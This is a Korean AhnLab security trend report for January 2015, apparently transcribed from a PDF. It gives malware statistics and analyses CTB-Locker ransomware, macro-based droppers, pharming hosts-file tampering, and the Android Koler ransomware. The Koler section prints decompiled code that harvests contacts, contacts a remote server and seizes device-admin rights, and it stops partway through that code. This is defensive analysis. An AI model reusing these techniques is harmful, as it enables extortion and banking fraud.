ASEC Report VOL.61 January, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서
|
|
- 보희 이
- 6 years ago
- Views:
Transcription
1 Security Trend ASEC Report VOL.61 January, 2015
2 ASEC Report VOL.61 January, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정 보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 1 월보안동향 Table of Contents 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 보안이슈 SECURITY ISSUE 01 비트코인요구하는랜섬웨어 CTB-로커 02 문서파일의매크로기능악용및문서아이콘으로위장한악성코드 03 파밍악성코드의 6가지공격유형 악성코드상세분석 ANALYSIS IN-DEPTH FBI 사칭해음란물소지혐의로협박하는악성앱 Koler 22 ASEC REPORT 61 Security Trend 2
3 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 ASEC REPORT 61 Security Trend
4 보안통계 01 악성코드통계 Statistics ASEC 이집계한바에따르면 2015 년 1 월한달간탐지된악성코드수는 3,689 만 5,683 건이다. 이는전 월 2,695 만 5,828 건보다 993 만 9,855 건증가한수치다. 한편 1 월에수집된악성코드샘플수는 354 만 9,667 건이다. [ 그림 1-1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플 수집수 는안랩이자체적으로수집한전체악성코드의샘플수를의미한다. 40,000,000 36,895,683 30,000,000 20,000,000 26,955,828 10,000,000 6,000,000 5,000,000 4,000,000 4,263,988 3,000,000 2,000,000 1,000,000 6,059,563 6,079,293 3,549,667 탐지건수샘플수집수 11 월 12 월 01 월 [ 그림 1-1] 악성코드추이 (2014 년 11 월 ~ 2015 년 1 월 ) ASEC REPORT 61 Security Trend 4
5 [ 그림 1-2] 는 2015 년 1 월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그램 인 PUP(Potentially Unwanted Program) 가 49.29% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 29.85%, 애드웨어 (Adware) 가 5.06% 로그뒤를이었다. 0.47% 3.16% 5.06% 49.29% 12.17% 29.85% PUP Trojan etc Adware Worm Downloader [ 그림 1-2] 2015 년 1 월주요악성코드유형 [ 표 1-1] 은 1 월한달간가장빈번하게탐지된악성코드 10 건을진단명기준으로정리한것이다. PUP/ Win32.MyWebSearch 가총 288 만 7,762 건으로가장많이탐지되었고, PUP/Win32.IntClient 가 221 만 323 건으로그뒤를이었다. [ 표 1-1] 2015년 1월악성코드탐지최다 10건 ( 진단명기준 ) 순위 악성코드진단명 탐지건수 1 PUP/Win32. MyWebSearch 2,287,762 2 PUP/Win32. IntClient 2,210,323 3 PUP/Win32.Helper 1,850,954 4 PUP/Win32.MicroLab 1,682,998 5 PUP/Win32.BrowseFox 1,606,363 6 PUP/Win32.SubShop 1,498,887 7 PUP/Win32.CrossRider 1,236,384 8 PUP/Win32.CloverPlus 742,503 9 PUP/Win32.Generic 717, PUP/Win32.WindowsTap 663,434 ASEC REPORT 61 Security Trend 5
6 보안통계 02 웹통계 Statistics 2015 년 1 월악성코드유포지로악용된도메인은 1,917 개, URL 은 2 만 4,254 개로집계됐다. 또한 1 월의 악성도메인및 URL 차단건수는총 810 만 4,699 건이다. 악성도메인및 URL 차단건수는 PC 등시스템 이악성코드유포지로악용된웹사이트의접속을차단한수이다. 9,000,000 8,104,699 8,000,000 7,000,000 6,000,000 6,330,313 6,420,752 5,000,000 4,000,000 40,000 30,000 24,254 20,000 10, ,018 1,460 11,612 1,917 악성도메인 /URL 차단건수 악성코드유포도메인수 0 11 월 12 월 01 월 악성코드유포 URL 수 [ 그림 1-3] 악성코드유포도메인 /URL 탐지및차단건수 (2014 년 11 월 ~ 2015 년 1 월 ) ASEC REPORT 61 Security Trend 6
7 보안통계 03 모바일통계 Statistics 2015 년 1 월한달간탐지된모바일악성코드는 10 만 8,607 건으로집계되었다. 250, , , ,000 98, , ,607 50, 월 12 월 01 월 [ 그림 1-4] 모바일악성코드추이 (2014 년 11 월 ~ 2015 년 1 월 ) ASEC REPORT 61 Security Trend 7
8 [ 표 1-2] 는 1 월한달간탐지된모바일악성코드유형중상위 10 건을정리한것이다. Android-PUP/ SmsReg 는지난달보다 2 만 3,000 여건감소한반면 Dowgin 은 1 만여건증가했다. [ 표 1-2] 2015 년 1 월유형별모바일악성코드탐지상위 10 건 순위악성코드진단명탐지건수 1 Android-PUP/Dowgin 24,493 2 Android-PUP/SmsReg 17,901 3 Android-Trojan/FakeInst 8,566 4 Android-Trojan/Opfake 2,887 5 Android-PUP/Noico 2,670 6 Android-Trojan/Mseg 2,344 7 Android-Trojan/SMSAgent 2,187 8 Android-PUP/Panhom 2,038 9 Android-PUP/Wapsx 1, Android-Trojan/SmsSend 1,646 ASEC REPORT 61 Security Trend 8
9 2 보안이슈 SECURITY ISSUE 01 비트코인요구하는랜섬웨어 CTB-로커 02 문서파일의매크로기능악용및문서아이콘으로위장한악성코드 03 파밍악성코드의 6가지공격유형 ASEC REPORT 61 Security Trend
10 보안이슈 01 비트코인요구하는랜섬웨어 CTB- 로커 Security Issue 최근 CTB-로커(Curve-Tor-Bitcoin Locker) 가국내에급속히증가함에따라랜섬웨어 (Ransomware) 에대한관심이높아지고있다. 랜섬웨어는 2005년신종보안위협으로처음보도되면서국내에알려졌다. 당시랜섬웨어는러시아와동유럽국가에한정되어있었다. [ 그림 2-1] 은첨부파일을통해유포되고있는랜섬웨어 CTB-로커의메일원문이다. 하지만인터넷이발전하고유포방식이다양해지면서랜섬웨어의위협은전세계로퍼져나가고있다. 다양한방법을통해불특정다수를대상으로한다는점, 감염 PC의데이터복구를위해대가를지불하는피해자가많다는점때문에악성코드제작자는랜섬웨어를수익모델로삼는경우가많다. 몇년동안공격수법도진화를거듭하여꾸준히새로운변종이등장하고있어주의가요구된다. 일반적인악성코드는사용자가감염되었다는사실을인지하지못하도록자신을숨기는것이특징이다. 반면랜섬웨어는사용자 PC의 가용성 을빌미로금전을취득해야하는만큼사용자에게감염사실을보다자극적으로알리려고한다. 그림 2-1 랜섬웨어 CTB- 로커의메일원문 메일의첨부파일은압축되어있으며압축을풀면 [ 그림 2-2] 와같이파일의확장자를볼수있다. 파일의확장자는일반적인실행파일의 EXE 가아닌화면보호기파일확장자인 SCR 이다. 하지만대부분의사용자는윈도탐색기옵션중 [ 폴더옵션 ] - [ 알려진파일형식의파일확장명숨기기 ] 를사용하는경우가대부분이어서파일명인 hunkered 만표기된다. 이때문에사용자는별다른의심없이파일을실행한다. ASEC REPORT 61 Security Trend 10
11 그림 2-2 확장자가보이지않는상태 ( 좌 ) / 확장자가보이는상태 ( 우 ) hunkered.scr 아이콘을실행하면문서파일이사 용자에게보인다. 1**.*5.3*.5:443 1**.15*.1**.7*:443 7*.*3.*7.*4:9090 1*.*9.*6.*2:443 1*.*1.*6.*6:443 1*.1*.1*.*2:443 8*.*9.**.*8:443 네트워크연결을시도하는 IP 중일부는토르 (Tor) 네트워크로접속을시도한다. 이는토르네트워크특성상추적이힘든점을이용한것으로, 공격자가사용자의정보수집시이용하는것으로추정된다. 그림 2-3 문서의내용 실행된파일은단순한문서파일이지만파일실행과동시에또다른악성파일을생성하며, 외부네트워크에연결을시도한다. [ 표 2-1] 에서생성된파일 exe( 랜덤파일명 ) 와 qgkhcub.exe 는같은파일이다. qgkhcub.exe는시스템에존재하는파일을암호화한다. qgkhcub.exe가실행되면 [ 그림 2-4] 와같이사용자에게파일이암호화된사실과복호화방법을바탕화면에경고팝업창을통해알린다. 표 2-1 생성되는파일 [ 생성되는파일 ] C: DOCUME~1 ADMINI~1 LOCALS~1 Temp hunkered.rtf C: DOCUME~1 ADMINI~1 LOCALS~1 Temp exe ( 랜덤파일명 ) C: DOCUME~1 ADMINI~1 LOCALS~1 Temp qgkhcub.exe 그림 2-4 변경된바탕화면 표 2-2 외부네트워크연결 [ 외부네트워크연결 ] :80 windowsupdate.microsoft.com 2**.1**.3*.1**:443 1**.9*.*.7:443 2**.1**.3*.1*:443 2**.1**.3*.3: :80 ip.*****.com 그림 2-5 사용자에게띄워주는경고팝업창 ASEC REPORT 61 Security Trend 11
12 악성코드는확장자파일을모두암호화시키며, 암호화대상파일의확장자는 [ 표 2-3] 과같다. 이후파일복호화를진행하면 [ 그림 2-8] 과같이비 트코인결제방법을안내한다. 표 2-3 암호화대상파일확장자 [ 암호화대상파일확장자 ].AI,.C,.CDR,.CER,.CRT,.DBF,.DER,.DOC,.DOCM,.DOCX,.EPS,.JPEG,.JPG,.JS,.MDB,.P12,.PAS,.PDF,.PFX,.PHP,.PL,.PPT,.PPTX,.PST,.PY,.RTF,.SQL,.TXT,.XLK,.XLS,.XLSM,.XLSX, etc 암호화대상파일확장자에는 공인인증서관련파일, 그림파일, 문서파일, 아웃룩데이터백업파일 등대부분자주사용하는것들이다. 랜섬웨어에감염된파일은암호화되어사용자들은불편을겪는다. 또한, 이전의랜섬웨어와동일하게사용자에게테스트로암호화된파일의복호화기능을제공하며이를대가로사용자에게결제를유도한다. 그림 2-6 사용자의결제를유도하는메시지 [ 그림 2-7] 과같이암호화된파일들은확장자뒤에랜덤문자열로구성된문자가추가된다. 그림 2-8 비트코인결제방법안내 하지만결제를하더라도파일이복구될가능성은낮다. 랜섬웨어는 AES 256, RSA 1024, RSA 2048 등다양한암호화알고리즘을사용한다. 이러한암호화알고리즘을깨기위한시간은수백년, 길게는수천년이상걸린다고한다. 따라서파일이암호화되면키없이복호화하는것은거의불가능하다. 감염된파일을치료할수없다면감염을예방하는방법이최우선이다. 악성코드의유입을사전에차단하면좋겠지만지금도수많은변종랜섬웨어가유포되고있어백신에만의존하기는어렵다. 그렇다고방법이없는것은아니다. 간단한방법으로랜섬웨어의감염을예방할수있는팁을소개한다. 원본을수정하는랜섬웨어는파일을읽어온후암호화알고리즘을통해데이터를수정한다. 그전에파일을수정하지못하도록막으면위협에서안전하다. 윈도에서는클릭몇번만으로파일의속성을변경할수있다. 중요파일을읽기전용으로변경하면랜섬웨어에의한감염을예방할수있다. 그림 2-7 암호화되어확장자가변경된파일 ASEC REPORT 61 Security Trend 12
13 그림 2-9 읽기전용으로변경해서랜섬웨어에감염되지않은파일 그림 2-10 백업및복원 윈도 7 이상의운영체제사용자라면, 윈도에서기본적으로제공하는백업및복원기능을이용하여파일, 폴더, 드라이브단위로중요데이터를저장하는방법을추천한다. 백업한파일은윈도가설치되어있는로컬드라이브외에다른드라이브나외부저장장치에저장하는것이안전하다. 한편, V3 제품에서는관련악성코드를다음과같이진단가능하다. <V3 제품군의진단명 > Trojan/Win32.Agent ( ) Trojan/Win32.CTBLocker ( ) Trojan/Win32.Ransom ( ) ASEC REPORT 61 Security Trend 13
14 보안이슈 02 문서파일의매크로기능악용및문서아이콘으로위장한악성코드 Security Issue 일반인들에게 PE(Portable Executable) 파일은생소하다. PE 파일은마이크로소프트의윈도 3.1부터지원되는실행파일이다. 사람들은실행파일이라는개념보다는확장자가 EXE 인파일에더익숙하다. 또한정보가넘쳐나는사이트, 블로그, 게시판또는메일내첨부된다수의실행파일들이안전하지않다는것은다아는사실이다. 그럼에도불구하고대부분의인터넷사용자들은문서파일 (PDF, DOC, HWP 등 ) 에대한보안의식이매우약하다. [ 그림 2-11] 은최근접수된악의적인매크로기능이추가된 MS 워드 (.doc) 파일이다. 매크로는문서작업의효율을높여주는유용한기능이지만, 사용자몰래악성코드를심을수있는위험한기능이될수도있다. 흔히 APT(Advanced Persistent Threat) 공격으로불리는지능화된악성코드의표적공격에문서파일이자주사용된다. 주의만하면 APT 공격으로부터안전할것이라는방심은금물이다. 누구라도사회공학적기법을이용한악성코드공격의피해자가될수있다는사실을인지하고주의하는것이중요하다. 그림 2-12 매크로기능 On 유도 [ 그림 2-12] 와같이 MS워드문서를실행하면문서상단바에매크로기능 OFF 알림메시지가나타나며, 매크로가자동으로동작하지않도록차단된다. 참고로매크로기능은보안상의문제로기본설정값이 OFF로되어있다. 그림 2-11 doc 파일 사용자입장에서매크로기능이차단됐다는보안경고알림메시지를본다면해당문서파일을닫을것이 ASEC REPORT 61 Security Trend 14
15 다. 하지만공격자는매우지능적으로 본문서는보안상모자이크처리됐으며, 문서상단의옵션을클릭하여활성화바람 이라는본문내용과함께이미지를흐리게처리했다. 아무리보안의식이높은사용자여도호기심이생길수있다. Settings [ 사용자계정 ] Local Settings Te mp msgss.exe 경로로자가복제한다. 또한 HKCU Software Microsoft Windo ws CurrentVersion Outlook 레지스트리키값을등록하여시스템시작시자동실행된다. 그림 2-13 doc 파일에삽입된매크로코드 그림 2-15 사용자가입력한키값을 C&C 서버로전송 해당문서의매크로기능을활성화하면 C: Windows Temp 경로에 adobeacdup-date. bat 와 adobeacd-updatexp.vbs 파일을생성하며, 배치 (batch) 파일에의해 adobeacdupdatexp.vbs 파일이실행된후자가삭제된다. 이후 x.exe 파일은사용중인프로그램정보와사용자가입력하는키값을일정시간마다 C&C서버 (1**.2*3.2**.2*9) 로전송한다. 위의악성코드는매크로기능을이용했지만그외에도 HWP, PDF, DOC 문서의취약점을이용한공격과단순히문서아이콘을도용한악성코드또한지속적으로발견되고있다. 문서아이콘을도용할때는파일의확장명숨김속성을악용하여사용자를속이는방법을이용한다. 최근에는엑셀문서아이콘을도용하여국가전략연구회정책위원명단으로위장한악성코드가발견되었다. 그림 2-14 adobeacd-updatexp.vbs 파일정보 배치파일에의해실행된 adobeacd-updatexp. vbs 는 C&C 서버로부터 x.exe 파일이추가로다운 및실행된다. 이후 x.exe 는 C: Documents and 그림 2-16 알려진파일형식의파일확장명숨기기해제 ASEC REPORT 61 Security Trend 15
16 [ 그림 2-16] 과같이 알려진파일형식의파일확장명숨기기 폴더옵션이적용되면엑셀파일처럼보일수있으나실제확장명은 exe로, 엑셀아이콘을위장한실행파일이다. 해당파일은내부에엑셀파일을포함하고있으며, 파일을실행하면엑셀파일 2015 정책위원.xlsx 와 conhost.exe 를동시에생성한후실행한다. 이후생성된엑셀파일을자동으로실행하고, 윈도실행명령을통해처음실행된파일 2015 정책위원 [1].xlsx.exe 를삭제하기때문에사용자는악성코드감염여부를알기어렵다. 표 2-4 생성되는악성파일1 [ 생성되는악성파일 1] C: Documents and Settings Administrator Local Settings Temp conhost.exe ( 악성파일이실행된폴더경로 ) 2015 정책위원.xlsx conhost.exe는 dfea.exe 파일을생성한후실행하며, dfea.exe는시스템이시작할때마다자동실행되도록시작프로그램에등록한다. 표 2-5 생성되는악성파일2 [ 생성되는악성파일2] C: WINDOWS tasks dfea.exe 표 2-6 추가되는레지스트리값 [ 추가되는레지스트리값 ] HKCU Software Microsoft Windows CurrentVersion Ru n dfea "C: WINDOWS tasks dfea.exe 테스트당시네트워크연결은되지않았으나, [ 표 2-7] 의 C&C 서버주소로접속을시도한것으로추정된다. 표 2-7 C&C 서버주소 [C&C 서버주소 ] h***ing.m**nc.com 그림 정책위원 [1].xlsx.exe 에포함된엑셀파일의일부분 이처럼점점더지능화되는악성코드로부터피해를최소화하려면보안수칙을잘지키는습관이중요하다. 발신이불분명한메일내첨부파일은호기심이생기더라도실행시키지않아야한다. V3 제품에서는관련악성코드를다음과같이진단가능하다. 그림 2-18 악성코드와동시에실행되는 2015 정책위원.xlsx 문서파일 <V3 제품군의진단명 > Dropper/Win32.Agent ( ) DOC/Downloader ( ) Trojan/Win32.Backdoor ( ) ASEC REPORT 61 Security Trend 16
17 보안이슈 Security Issue 03 파밍악성코드의 6가지공격유형 2014년한해를뜨겁게달군 파밍 (Pharming) 공격은여전히현재진행형이다. 파밍은사용자 PC에악성코드를감염시켜은행사이트에접속할경우가짜사이트로연결되도록조작해금융정보를빼내는공격방법이다. 이러한가짜사이트는실제사이트와유사하므로주의가필요하다. 가짜사이트를인지하지못한다면파밍공격의피해자가될수있기때문이다. 공격자는피해자가인지하지못하도록가짜사이트로연결하기위해많은방법을사용해왔다. 공격자가그동안사용해온방법의변화를알아보자. 1. 호스트파일변조 [ 그림 2-19] 와같이일반적으로사용자가웹사이트에접속하기위해 URL을입력하면사용자시스템의 호스트 (host) 파일을확인한다. 파일내부에입력된영문주소가있으면파일에기록된 IP 주소로웹사이트에연결된다. 파일내부에영문주소가없으면외부네트워크에있는 DNS(Domain Name System) 서버를통해변환된 IP 주소로웹사이트에연결된다. 그림 2-19 웹사이트접속과정 이때, 공격자는이를활용하여사용자를가짜사이트로접속하도록유도하였다. 악성코드에감염되면시스템에존재하는 C: Windows System32 drivers etc hosts 파일을 [ 표 2-8] 과같이변조한다. 표 2-8 변조된호스트파일 [hosts] 1**.7*.2**.8* *****.com 1**.7*.2**.8* 1**.7*.2**.8* 1**.7*.2**.8* *****.co.kr 1**.7*.2**.8* 1**.7*.2**.8* ****.Co.Kr 1**.7*.2**.8* 1**.7*.2**.8* *******.NeT 이하생략 [ 표 2-8] 의좌측에는공격자가제작한가짜사이트의 IP 주소가기록되며우측에는포털사이트및금융 ASEC REPORT 61 Security Trend 17
18 사이트의 URL 이기록된다. 호스트파일이변조되면 정상 URL 을입력해도사용자가모르는사이가짜 사이트로연결된다. 또한호스트파일과변조여부탐지를막기위해다수의공백문자 (NULL) 를파일에삽입하여호스트파일의용량을늘리거나알수없는숫자를삽입하기도한다. 표 2-9 탐지를막기위해변조된호스트파일 그림 2-20 호스트파일변조후웹사이트접속과정 2. hosts.ics 파일변조호스트파일을변조한웹사이트가증가하고호스트파일의변조여부를각종보안프로그램이탐지하자, 공격자는새로운파일을변조하게되었다. 바로 hosts.ics 파일변조이다. hosts 파일과무슨차이가있을까싶지만두파일은 C: Windows Syst em32 drivers etc 경로에서생성되는공통점은있지만참조우선순위가다르다. 웹사이트에접속할때 hotst 파일보다 hosts.ics 파일을먼저확인하는것이차이점이다. [hosts] 3*.2**.1*.1** *****.com *.2**.1*.1** *.2**.1*.1** ****.net *.2**.1*.1** *******.net *.2**.1*.1** *.2**.1*.1** ****.com *.2**.1*.1** 이하다수의공백문자 3. 팝업이미지삽입호스트파일을변조하지않고사용자몰래실행된악성코드는시스템의인터넷익스플로러활동을감시한다. 정해진조건에만족하면실행중인웹페이지화면위에가짜사이트로연결되는이미지를표시한다. 이후사용자가링크를클릭하면가짜사이트로연결된다. 따라서보안프로그램에의해변조여부를감시받는호스트파일을변조하지않고, hosts.ics 파일을변조하여사용자를가짜사이트로유도하는것이다. 그림 2-22 호스트파일을변조하지않고가짜사이트로유도하는과정 그림 2-21 호스트파일변조후웹사이트접속과정 4. VPN 터널링위의 팝업이미지삽입 방식과유사하지만가짜사 ASEC REPORT 61 Security Trend 18
19 이트로연결할때가상사설망 (Virtual Private Network, VPN) 을이용하여연결하는방법도있 다. 6. DNS 주소변조호스트파일을변조하지않고감염된시스템의 DNS 서버주소를변경하는방법도있다. 그림 2-23 파밍사이트접속경고안내페이지 5. 메모리패치공격자는호스트파일을변조하지만 C: Window s System32 drivers etc 경로에저장하지않는다. 대신 C: Windows System32 drivers 임의폴더명 임의파일명 으로저장한다. 그리고함께실행된악성코드로인해웹사이트접속시메모리상에존재하는호스트파일참조경로를 C: Windows System32 drivers 임의폴더명 임의파일명 으로변경한다. 이렇게경로가변경되면정상경로의호스트파일을참조하지않고변경된경로의변조된호스트파일을참조한다. 그림 2-25 변조된 DNS 서버주소 [ 그림 2-25] 와같이 DNS 서버주소가 로변경되면악성코드에감염된 PC는 DNS 서버가된다. 따라서웹사이트접속시외부의 DNS 서버에접속하지않고감염된 PC로접근한다. 이후실행중인악성코드에의해가짜사이트로연결되는 IP 주소를수신한다. 그림 2-24 메모리패치과정 그림 2-26 변조된 DNS 주소를가질때웹사이트접속과정 ASEC REPORT 61 Security Trend 19
20 이러한파밍악성코드는보안프로그램의탐지를피하기위해끊임없이변화하고있다. 파밍악성코드감염을예방하려면보안업데이트를꼼꼼히확인하고, 설치한백신제품을최신버전으로유지해야한다. V3 제품에서는관련악성코드를다음과같이진단가능하다. <V3 제품군의진단명 > Trojan/Win32.Banki ( ) Trojan/Win32.Agent ( ) Trojan/Win32.Qhosts ( ) Trojan/Win32.Connector ( ) Trojan/Win32.Banker ( ) Trojan/Win32.StartPage ( ) ASEC REPORT 61 Security Trend 20
21 3 악성코드상세분석 Analysis-In-Depth FBI 사칭해음란물소지혐의로협박하는악성앱 Koler ASEC REPORT 61 Security Trend
22 악성코드상세분석 Analysis-In-Depth FBI 사칭해음란물소지혐의로협박하는악성앱 Koler 스마트폰사용자를협박하여금전을갈취하는다양한형태의악성앱이등장하고있다. 이글에서는최근화제가된해외스마트폰사용자들을노린금품갈취형악성앱 Android-Trojan/Koler 에대해상세히살펴본다. 1. 개요 Android-Trojan/Koler는성인동영상플레이어앱으로위장하여사용자스마트폰에설치되며, 이앱을실행하면웹사이트화면으로성인동영상목록을보여준다. 이어 FBI를사칭한 불법성인동영상을소지한사실이적발되었다 는경고창이나타나고벌금 500달러를지불할것을요구한다. 권위있는수사기관인 FBI를사칭해사용자에게두려움을느끼게하여돈을지불하게만드는수법으로, 일종의사회공학기법을이용한악성앱이다. 기술적인기법면에서보면, 악성앱의화면으로스마트폰의모든화면을덮어버리고다른화면이나타날때또다시자신의화면을나타나게해사용자의스마트폰사용을방해하는방식을사용한다. 사용자는해당앱에의한허위경고창을종료할수없으며스마트 폰기기의버튼입력또한제한된다. 또한스마트폰을재부팅하더라도동일한경고창이나타나사용자는정상적으로스마트폰을이용할수없다. 2. 주요기능악성앱 Android-Trojan/Koler가처음실행되면스마트폰에저장된연락처정보, 이메일계정정보, 빌드버전, 기기이름, 제조사정보, 전화번호, 국가정보등을공격자의서버로전송한다. 또한스마트폰기기의전면카메라를이용해사용자의얼굴촬영을시도하고촬영한이미지를저장한다. 앞서언급한데이터들과함께촬영한사용자사진을서버로전송하고나면또다른웹화면을나타낸다. 이웹화면은항상최상위에서나타나고단말기의버튼이용을제한해사용자가화면을종료할수없게한다. 재부팅을하더라도부팅후다시해당웹사이트를호출하여화면에나타낸다. 또한사용자가기기관리자권한을해제하기위해 확인 버튼을누르면 애플리케이션의모든데이터가초기화된다 는경고문구를나타내관리자권한해제를하지않도록유도한다. Android-Trojan/Koler는 ASEC REPORT 61 Security Trend 22
23 이외에도서버에서전달받은명령어에따라프로세스를종료하는기능도갖고있다. 그러나일정시간이지나면해당앱은 FBI 로고와함께 [ 그림 3-3] 과같은허위경고창을나타낸다. 3. 설치및증상 Android-Trojan/Koler는 PornDroid 라는이름의앱으로유포되었다. 앱설치시, [ 그림 3-1] 과같이연락처, 카메라, 인터넷사용에대한권한을요구한다. 그림 3-3 FBI 를사칭한허위경고창 그림 3-1 허위앱 PornDroid 설치시권한요구 이앱을실행하면 기기관리자 권한을요구한다. 사용자가별다른의심없이 실행 버튼을클릭하면해당앱이계속실행되면서성인동영상이미지를노출하고이를클릭하면동영상을재생한다. 해당경고창은 아동음란물을소지한것을감지했고, 이는범죄행위이므로디바이스잠금기능을적용했으며 500달러의벌금을지불하라 는내용을담고있다. 또한단말기정보와전화번호, 연락처정보를보여주고, 스마트폰의전면카메라로사용자의얼굴을촬영했으며이정보가 FBI에등록되었다고경고한다. 이어단속되었다는아동음란물화면을보여준다. 이경고창이나타나면모든단말기버튼의동작이제한되며, 사용자는해당화면을종료할수없다. 겨우해당화면을종료하더라도곧다시나타난다. 4. 동작방식상세분석악성앱 Android-Trojan/Koler의명세서인 AndroidManifest.xml 파일은 [ 그림 3-4] 와같다. 그림 3-2 기기관리자권한실행후성인이미지가노출됨 <?xml version='1.0' encoding='utf-8'?> <manifest xmlns:android=" res/android" android:versioncode="1" android:versionname="1.0" package="hmv. paafyx.bbuzrdt"> ASEC REPORT 61 Security Trend 23
24 <uses-sdk android:minsdkversion="9"/> <uses-permission android:name="android.permission. INTERNET"/> <uses-permission android:name="android.permission. ACCESS_NETWORK_STATE"/> <uses-permission android:name="android.permission. READ_PHONE_STATE"/> <uses-permission android:name="android.permission. RECEIVE_BOOT_COMPLETED"/> <uses-permission android:name="android.permission. WAKE_LOCK"/> <uses-permission android:name="android.permission.get_ ACCOUNTS"/> <uses-permission android:name="android.permission. WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission. READ_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission. SYSTEM_ALERT_WINDOW"/> <uses-permission android:name="android.permission. CAMERA"/> <uses-permission android:name="android.permission. READ_CONTACTS"/> <uses-permission android:name="android.permission.get_ TASKS"/> <uses-permission android:name="android.permission. WRITE_SETTINGS"/> <uses-permission android:name="android.permission. VIBRATE"/> <uses-feature android:name="android.hardware.camera. front" android:required="false"/> <uses-feature android:name="android.hardware.telephony"/> <uses-permission android:name="android.permission. READ_CONTACTS"/> <application 7f020001" android:screenorientation="1" android:configchanges="0xb0"> <activity 7f020001" android:name="sampleoverlayshowactivity" android:screenori entation="1" android:configchanges="0xb0"> <intent-filter> <action android:name="android.intent.action.main"/> <category android:name="android.intent.category. LAUNCHER"/> </intent-filter> </activity> <activity android:name="sa mpleoverlayhideactivity"/> <service android:name="overlayservice"/> <receiver android:name="hmv.paafyx.bbuzrdt.bootme" android:permission="android.permission.receive_boot_ COMPLETED"> <intent-filter android:priority="999"> <action android:name="android.intent.action. REBOOT"/> <action android:name="android.intent.action.boot_ COMPLETED"/> <action android:name="android.intent.action. QUICKBOOT_POWERON"/> </intent-filter> </receiver> <receiver android:name="hmv.paafyx.bbuzrdt.alarmmanag erbroadcastreceiver"/> <receiver android:label="porndroid" android:name="hmv. paafyx.bbuzrdt.catcher" android:permission="android. permission.bind_device_admin" android:enabled="true"> <meta-data android:name="android.app.device_admin" <meta-data android:name="checkdelay" android:value="1"/> <meta-data android:name="preventrestart" android:value="true"/> <meta-data android:name="stopondevicelock" android:value="false"/> <intent-filter> <action android:name="android.app.action.action_ DEVICE_ADMIN_DISABLED"/> <action android:name="android.app.action.action_ DEVICE_ADMIN_DISABLE_REQUESTED"/> <action android:name="android.app.action.device_ ADMIN_ENABLED"/> </intent-filter> <category android:name="android.intent.category. DEFAULT"/> </receiver> <meta-data android:name="sub" android:value="8"/> </application> </manifest> 그림 3-4 Android-Trojan/Koler의 AndroidManifest.xml ASEC REPORT 61 Security Trend 24
25 AndroidManifest.xml에따르면악성앱 Android-Trojan/Koler는연락처정보와외부저장소에대한접근권한을요구한다. 네트워크상태를확인하고인터넷에접속할수있다. 카메라에관한권한을요구하는데, 전면카메라에대한권한을요구하고있다. 디바이스가부팅되면자동으로실행하고기기관리자권한에대한동작을하는기능이있다 악성앱시작안드로이드앱의실행부인 classes.dex 파일내부의클래스들과연관된권한, 문자열등의관계를시각화시켜보면 [ 그림 3-5] 와같다. EP에서메인액티비티인 SampleOverlayShowActivity 와그내부에서실행되는 RequestTask, PhotoMaker, catcher, TestWebViewClient, WebAppInterface 클래스들을볼수있다. 그림 3-5 classes.dex 파일내부의클래스관계도 [ 그림 3-5] 의주요클래스와그기능을정리하면 [ 그림 3-6] 과같다. SampleOverlayShowActivity RequesTask PhotoMaker catcher TestWebViewClient WebAppInterface 연락처정보 관리자권한 WebView 를통해 file:///android_asset/video.html 실행 연결 단말기기본정보전송 서버로부터명령어수신 전면부카메라실행 사진촬영후사진저장 관리자권한 동영상 URL 자바스크립트인터페이스 봇기능 그림 3-6 Android-Trojan/Koler 앱의주요클래스및기능 4.2. SampleOverlayShowActivity 메인액티비티인 SampleOverlayShowActivity 클래스를자세히살펴보면 [ 그림 3-7] 과같다. protected void oncreate(bundle p21) { this.oncreate(p21); if(this.getsharedpreferences("cocon", 0).getInt("status", 0) == 77) { Process.killProcess(Process.myPid()); v1 = new RequestTask(this); v2 = new String[3]; v2[0] = " v2[1] = "start"; v2[2] = ""; v1.execute(v2); v9 = this.managedquery(contactscontract$commondatak inds$phone.content_uri, 0, 0, 0, 0).getCount(); v18 = 0; v14 = this.getcontentresolver().query(contactscontract$c ommondatakinds$phone.content_uri, 0, 0, 0, 0); v13 = ""; ASEC REPORT 61 Security Trend 25
26 while (v14.movetonext()!= 0) { v18 = (v18 + 1); v13 = new StringBuilder(String.valueOf(v13)).append(v14. getstring(v14.getcolumnindex("data1"))).append(" ").append(v14. getstring(v14.getcolumnindex("display_name"))).append(" ").tostring(); if(v18 > 5) { break; v12 = this.getsharedpreferences("cocon", 0).edit(); v12.putint("countphones", v9); v12.putstring("listphones", v13); v12.commit(); this.devicepolicymanager = this.getsystemservice("device_ policy"); this.demodeviceadmin = new ComponentName(this, catcher); if(this.devicepolicymanager.isadminactive(this. demodeviceadmin) == 0) { this.ebat(); else { this.colotit(); return; 그림 3-7 SampleOverlayShowActivity 클래스 SampleOverlayShowActivity 클래스에따르면, 해당악성앱은 RequestTask를호출하면서파라미터로서버주소인 com/api/app.php를사용한다. 또한스마트폰에저장된연락처개수와연락처정보를읽어 SharedPreferences에저장한다. 악성앱에관리자권한이부여되었는지를확인하고관리자권한이없을경우 ebat를호출해서관리자권한을얻는다. 관리자권한이있으면 colotit를호출한다. protected void ebat() { v0 = new Intent("android.app.action.ADD_DEVICE_ADMIN"); v0.putextra("android.app.extra.device_admin", this. demodeviceadmin); v0.putextra("android.app.extra.add_explanation", "To run the application - activate"); this.startactivityforresult(v0, 47); return; 그림 3-8 관리자권한획득시도 관리자권한에대한 catcher를호출하고처리되면 onactivityresult가호출된다. protected void onactivityresult(int p3, int p4, Intent p5) { switch(p3) { case 47: if (p4!= 15) { Log.i("DevicePolicyDemoActivity", "Administration enable FAILED!"); this.ebat(); else { 